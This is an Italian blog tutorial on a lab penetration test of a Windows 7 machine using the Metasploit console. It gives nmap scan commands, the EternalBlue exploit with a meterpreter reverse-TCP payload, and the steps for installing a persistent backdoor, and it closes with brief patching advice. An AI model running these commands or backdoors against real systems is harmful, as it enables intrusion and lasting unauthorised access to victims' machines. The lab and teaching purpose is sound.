fbpx

PenTest Completo Con Metasploit

Il Test in questione verrà condotto in Locale e vedrà come Vittima ancora una volta la Macchina Win7.
Nel Test precedente abbiamo utilizzato Armitage (Versione Grafica di Metasploit.), ma stavolta condurremo lo stesso Test dalla Console di MSF (Terminale). Questo per farvi comprendere meglio le differenze tra la GUI ed il Terminale (Leggi Articolo “PenTest Completo con Armitage“).
Prima di proseguire, è oppurtuno far presente che la fase che precede un PenTest è il Vulnerability Assessment (VA) di cui parliamo in questo articolo: “Vulnerability Assessment (VA) con Nessus“.
Negli Step a seguire abbiamo aggiunto dei passaggi in più.
Step by Step:
1)Indentificazione della Rete e del nostro IP
2)Individuare gli Host Attivi nella Rete
3) Ricognizione – Port Scan sul Target (per trovare i servizi attivi)
4) Scelta dell’Exploit e a seguire Exploitation!
5) Escalare i Privilegi – Ottenere permessi di RooT
6) Post Exploitation – Installare una BackDoor Persistente.
7) Come Difendersi?

FASE 1 Determiniamo il Range di IP ed individuiamo il nostro PC. Eseguire il comando “ifconfig

FASE 2 Scoviamo Host attivi nella LocalNet. Eseguiamo un Ping Scan con NMAP : “nmap -sn -n 172.136.123.1/24

FASE 3 Una volta scelto il nostro Target procediamo con una ricognizione. Eseguiamo un Intense Scan con NMAP per Raccogliere maggiori informazioni. Diamo il Comando: “nmap -T4 -A 172.136.123.38

FASE 4 Scelta dell’Exploit. Ancora una volta la scelta ricade su EternalBlue (la macchina è la stessa). Per cui i comandi da eseguire e relativi settaggi (nel nostro caso) sono i seguenti:
use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOST 172.136.123.38
exploit
Otterremo cosi una sessione di Meterpreter come da foto a seguire

FASE 5 Escalare i Privilegi. Come già sappiamo, EternalBlue ci consente di essere RooT sin da subito, per cui NON occorre il comando “getsystem“, limitiamoci a fare una verifica con i comandi “shell” e poi “whoami

FASE 6 BackDoor Persistente. Per concludere, prima di andarcene, installiamo una BackDoor Persistente (cosi anche se la Vittima spegne il PC noi restiamo collegati). Settate il Modulo dell’Exploit come in Foto a seguire:

Una volta lanciato con il comando “exploit” otterremo un altra Sessione di Meterpreter (ma stavolta) Persistente.

FASE 7 Come Difendersi?

Innanzitutto scaricare la Patch di sicurezza Microsoft e seguire la guida:

https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010

Per il resto, settare adeguatamente il vostro Firewall e disporre di un AV aggiornato. Per maggiori dettagli vi invito a leggere l’Articolo: “Come Difendere il Tuo PC“.

Adesso avete visto la Differenza tra il terminale MSF e la versione GUI Armitage (PenTest Armitage). Tutto sommato (Mia Modesta Opinione) non importa se usate una GUI o un Terminale… L’importante è comprendere ciò che fate. C’è da aggiungere che una GUI è certmente più comoda e vi permette di eseguire un PenTest (Relativamente) in minor Tempo… Ma tutto sommato è una questione di abitudine 😉 . Grazie per la Lettura!

 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Un commento su “PenTest Completo Con Metasploit”